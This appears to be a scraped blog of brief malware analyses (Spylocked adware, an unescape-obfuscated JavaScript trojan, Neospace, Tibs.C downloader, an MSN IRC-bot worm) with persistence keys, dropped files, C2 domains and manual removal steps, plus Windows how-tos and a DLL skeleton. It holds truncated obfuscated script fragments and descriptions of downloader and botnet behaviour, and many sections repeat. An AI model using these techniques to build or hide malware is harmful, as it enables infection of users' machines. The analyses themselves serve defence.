If it is present then it will get the value of DisplayIcon and it will execute it.
If it's not present, the dll will show a flashing icon in the system tray and a fake warning message:
"System has detected a number of active spyware applications that may impact the performance of your computer.
Click the icon to get rid of unwanted spyware by downloading an up to date antispyware solution."
If a user click on the icon then a new internet explorer window appeares and a connection is made to:
http://www.spylocked.com
[Clean]
1. Terminate the rundll32.exe process
2. Delete the %WINDIR%\System32\rcohty.dll file
3. Open regedit and delete the following keys
HKEY_CLASSES_ROOT\CLSID\{b23dc537-3e13-44c7-bf67-d8405eb377f7}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler\{b23dc537-3e13-44c7-bf67-d8405eb377f7}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Windows Safety Alert
HKLM\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad, bedstead
[Description]
This is an Adware program that is designed to show fake messages in order to trick the user in downloading certain programs
When it is executed the malware will create the following registry keys:
HKCR\CLSID\{b23dc537-3e13-44c7-bf67-d8405eb377f7}
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler\{b23dc537-3e13-44c7-bf67-d8405eb377f7}
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Windows Safety Alert, DisplayName
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Windows Safety Alert, UninstallString
HKLM\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad, bedstead
In order to run at startup, the spylocked adware uses two registry keys:
The SharedTaskScheduler and ShellServiceObjectDelayLoad which is used to load the dll automatically by Explorer.exe
when the computer starts.
It drops a file named rcohty.dll to %WINDIR%\System32 folder.
When the dll is loaded by rundll32 it will do the following:
It verify the existance of the key:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpywareLocked 3.5
If it is present then it will get the value of DisplayIcon and it will execute it.
If it's not present, the dll will show a flashing icon in the system tray and a fake warning message:
"System has detected a number of active spyware applications that may impact the performance of your computer.
Click the icon to get rid of unwanted spyware by downloading an up to date antispyware solution."
If a user click on the icon then a new internet explorer window appeares and a connection is made to:
http://www.spylocked.com
[Clean]
1. Terminate the rundll32.exe process
2. Delete the %WINDIR%\System32\rcohty.dll file
3. Open regedit and delete the following keys
HKEY_CLASSES_ROOT\CLSID\{b23dc537-3e13-44c7-bf67-d8405eb377f7}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler\{b23dc537-3e13-44c7-bf67-d8405eb377f7}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Windows Safety Alert
HKLM\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad, bedstead
Unescape Script Trojans
( a short analysis of Trojan.Agent.AKT )
[Description]
This is a java script trojan. Basically it just open a connection to a webpage for adults.
Below I will present some technical details that are usually encountered in most javascript trojans.
The code of this trojan looks something like this: (only a part will be shown)
N.B.:
This code is usually added in adult web-sites and is set to be triggered by a certain action.
The unescape function replace all characters encoded with the %xx hexadecimal form by their ASCII character.
So, when that script is executed, the real code will be like this:
After that it is a call to this function. The parameter is actually a code that opens a specific window.
So, the dF function decrypts the %264Dtdsjqu%2631... to
http://egno{blocked}.com/questbook/in.cgi?...&HTTP_REFERER=file...NAME_OF_THE_FILE.html...
[Clean]
In order to clean the computer, you just need to delete the html file that is having this script in it.
[Description]
This is a java script trojan. Basically it just open a connection to a webpage for adults.
Below I will present some technical details that are usually encountered in most javascript trojans.
The code of this trojan looks something like this: (only a part will be shown)
< language="javascript">
document .write(unescape ('%3C%73%63%72%69...'));dF('%264Dtdsjqu%2631...')< /script >
N.B.:
This code is usually added in adult web-sites and is set to be triggered by a certain action.
The unescape function replace all characters encoded with the %xx hexadecimal form by their ASCII character.
So, when that script is executed, the real code will be like this:
< language="javascript">
function dF(s)
{
var s1= unescape (s.substr(0,s.length-1));
....
}
After that it is a call to this function. The parameter is actually a code that opens a specific window.
So, the dF function decrypts the %264Dtdsjqu%2631... to
http://egno{blocked}.com/questbook/in.cgi?...&HTTP_REFERER=file...NAME_OF_THE_FILE.html...
[Clean]
In order to clean the computer, you just need to delete the html file that is having this script in it.
Neospace Trojan
(aka Trojan.Horse3.ABC )
[Description]
It creates a mutex named [Windows_Alert] in order to verify if the system is already infected.
It shows a message box with a fake warning:
"Windows has detected spyware programs running on your computer.
It is strongly recommended to use special software tools to prevent data loss.
Windows will now download the newest antispyware for you.
Click OK to protect your computer from spyware"
Then it tries to open a connection to http://www.neospa{blocked}celab.com
After 2 minutes (120 sec), it will copy itself in the Windows system folder under the name wincrt.exe
Also it will add the following registry key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run, Windows Critical Alert
having the value
(%Windir% is usually C:\Windows)
[Clean]
In order to clean the computer, please restart it in Safe Mode and do the following:
- Locate and delete the file:
- Go to Start, Run, type regedit and press OK.
- Navigate to:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
-Delete the key:
Windows Critical Alert with the value
[Description]
It creates a mutex named [Windows_Alert] in order to verify if the system is already infected.
It shows a message box with a fake warning:
"Windows has detected spyware programs running on your computer.
It is strongly recommended to use special software tools to prevent data loss.
Windows will now download the newest antispyware for you.
Click OK to protect your computer from spyware"
Then it tries to open a connection to http://www.neospa{blocked}celab.com
After 2 minutes (120 sec), it will copy itself in the Windows system folder under the name wincrt.exe
Also it will add the following registry key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run, Windows Critical Alert
having the value
%WINDIR%\System32\wincrt.exe(%Windir% is usually C:\Windows)
[Clean]
In order to clean the computer, please restart it in Safe Mode and do the following:
- Locate and delete the file:
%Windir%\System32\wincrt.exe- Go to Start, Run, type regedit and press OK.
- Navigate to:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
-Delete the key:
Windows Critical Alert with the value
%WINDIR%\System32\wincrt.exe
Tibs.C Trojan
(aka Trojan.Downloader.Tibs.C, Trojan-Downloader.Win32.Tibs.gc TR/Dldr.Tibs.C )
[Description]
This trojan copies itself in the system directory with the name kernels88.exe
It bypass the builtin Windows Firewall in order to allow the malware to connect to the internet
in order to download some files in the windows system folder and to execute them.
The name of some of the files starts with: dlh9jkd1q%number%.exe
Other files have the name %number%.dllb
Also there is a file called: vx.tll
All of them can be found in the Windows System folder (eq: C:\Windows\System32\vx.tll)
It steal some information regarding the computer where the malware is present.
Those information are: version of the operating system, build, platform, processor type, etc...
Also it set registry keys in SOFTWARE\Microsoft\Windows\CurrentVersion\Run and SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices in order to run at startup.
It tries to create a semaphore called outpost.exe and at the end it will disable the Task Manager
[Clean]
In order to clean the computer, please restart it in Safe Mode and delete the following files:
Delete the registry keys:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run - System
SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices - SystemTools
Go to Start, Run, type: netsh firewall reset and press OK
To enable Task Manager click on Start, Run, type:
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
Then click OK
[Description]
This trojan copies itself in the system directory with the name kernels88.exe
It bypass the builtin Windows Firewall in order to allow the malware to connect to the internet
in order to download some files in the windows system folder and to execute them.
The name of some of the files starts with: dlh9jkd1q%number%.exe
Other files have the name %number%.dllb
Also there is a file called: vx.tll
All of them can be found in the Windows System folder (eq: C:\Windows\System32\vx.tll)
It steal some information regarding the computer where the malware is present.
Those information are: version of the operating system, build, platform, processor type, etc...
Also it set registry keys in SOFTWARE\Microsoft\Windows\CurrentVersion\Run and SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices in order to run at startup.
It tries to create a semaphore called outpost.exe and at the end it will disable the Task Manager
[Clean]
In order to clean the computer, please restart it in Safe Mode and delete the following files:
C:\windows\system32\kernels88.exe
C:\Windows\System32\dlh9jkd1q1.exe
C:\Windows\System32\dlh9jkd1q2.exe
C:\Windows\System32\dlh9jkd1q5.exe
C:\Windows\System32\dlh9jkd1q6.exe
C:\Windows\System32\dlh9jkd1q7.exe
C:\Windows\System32\dlh9jkd1q8.exe
C:\Windows\System32\1.dllb
C:\Windows\System32\2.dllb
C:\Windows\System32\3.dllb
C:\Windows\System32\4.dllb
C:\Windows\System32\5.dllb
C:\Windows\System32\6.dllb
C:\Windows\System32\7.dllb
C:\Windows\System32\vx.tll
Delete the registry keys:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run - System
SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices - SystemTools
Go to Start, Run, type: netsh firewall reset and press OK
To enable Task Manager click on Start, Run, type:
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
Then click OK
MSN Messenger Photo Album Virus
(aka Worm.Sedoubot.A , Backdoor.IRCBot.AAQ)
[Description]
When it's executed, the malware will create a file named rdihost.dll in %Windir%\System32 folder and it will inject it in explorer.exe and a mutex will be created with the name: "suckmydick:pomgfuckingstupidgay!!!"
It will create an own copy as an archive in %windir% folder, named "photo album.zip"
Then it will connect to an IRC channel on www.fre[blocked]e8.biz and will wait for commands from a malicious attacker. The connection string is "lol lol lol :shadowbot2"
Based on those commands the Security Center and SharedAccess services can be stopped. Also it can download and execute files or it can attack other computers.
The attack is DDOS (Distributed Denial of Service) type and it is triggerd when a command is sent to the compromised system. On the Internet, a distributed denial-of-service (DDoS) attack is one in which a multitude of compromised systems attack a single target, thereby causing denial of service for users of the targeted system. The flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to the system to legitimate users.
[Clean]
In order to clean the computer, please restart it in Safe Mode and delete the following files:
Removal Tool available here
[Description]
When it's executed, the malware will create a file named rdihost.dll in %Windir%\System32 folder and it will inject it in explorer.exe and a mutex will be created with the name: "suckmydick:pomgfuckingstupidgay!!!"
It will create an own copy as an archive in %windir% folder, named "photo album.zip"
Then it will connect to an IRC channel on www.fre[blocked]e8.biz and will wait for commands from a malicious attacker. The connection string is "lol lol lol :shadowbot2"
Based on those commands the Security Center and SharedAccess services can be stopped. Also it can download and execute files or it can attack other computers.
The attack is DDOS (Distributed Denial of Service) type and it is triggerd when a command is sent to the compromised system. On the Internet, a distributed denial-of-service (DDoS) attack is one in which a multitude of compromised systems attack a single target, thereby causing denial of service for users of the targeted system. The flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to the system to legitimate users.
[Clean]
In order to clean the computer, please restart it in Safe Mode and delete the following files:
%Windir%\photoalbum.zip
%Windir%\system32\rdihost.dll Removal Tool available here
How to boot in safe mode
Safe mode is a diagnostic mode that the operating system can start in,
with minimal configuration so that system errors can possibly be corrected.
In order to boot in safe mode please do the following:
1. Restart the computer
2. Press on the F8 key every few seconds as the system boots up until the screen
with the Safe Mode option appears.
(If Windows launches before you can choose a safe mode, restart the computer and try again.)
3. You should see a few options but use the arrow keys
to highlight Safe Mode and press the Enter key.
4. The system will now boot into Safe Mode.
(You may receive a prompt asking if you really want to boot into Safe Mode. Choose Yes.)
with minimal configuration so that system errors can possibly be corrected.
In order to boot in safe mode please do the following:
1. Restart the computer
2. Press on the F8 key every few seconds as the system boots up until the screen
with the Safe Mode option appears.
(If Windows launches before you can choose a safe mode, restart the computer and try again.)
3. You should see a few options but use the arrow keys
to highlight Safe Mode and press the Enter key.
4. The system will now boot into Safe Mode.
(You may receive a prompt asking if you really want to boot into Safe Mode. Choose Yes.)
How to enable the Administrator account in Windows Vista (Ultimate Edition)
Open Control Panel, go to Administrative Tools and open Local Security Policy.
Then open Local Policies and expand the Security Options item,right click on Administrator
account status select Properties, click on the Enabled option and then click on OK button.
After you have enabled the Administrator account you need to set a password for it.
In order to do that, follow the steps below:
Open Control Panel, go to Administrative Tools, Computer Management and expand the
Local Users and Groups item. Now right click on the Administrator account and select Set password
Now that you have set a password you can logoff and then logon as Administrator.
Enjoy :)
How to run programs as Administrator in Windows Vista from a restricted user account
How to create a dll
If you are interested in this post then I assume that you know what is a dll,
if not you can find a definition here
Below I will give you an empty framework of what you need to create a dll.
There are two files: mylib.c (that contains your functions) and mylib.def that contains
the functions that you want to make accessible for other programs (the exported functions).
mylib.c
The mylib.def will contain:
Now you need to compile your mylib.c file with the following switches:
Enjoy :)
if not you can find a definition here
Below I will give you an empty framework of what you need to create a dll.
There are two files: mylib.c (that contains your functions) and mylib.def that contains
the functions that you want to make accessible for other programs (the exported functions).
mylib.c
#include "stdio.h"
__declspec(dllexport) int __stdcall myFunc()
{
printf("Text from my dll\n");
return 0;
}
__declspec(dllexport) int __stdcall DllMain()
{
return 0;
}The mylib.def will contain:
LIBRARY mylib
EXPORTS
myFunc
Now you need to compile your mylib.c file with the following switches:
cl mylib.c /LD /O2 /Gz /GD /W3 /link advapi32.lib /DLL /NOLOGO /DEF:mylib.def /RELEASEEnjoy :)
Subscribe to:
Posts (Atom)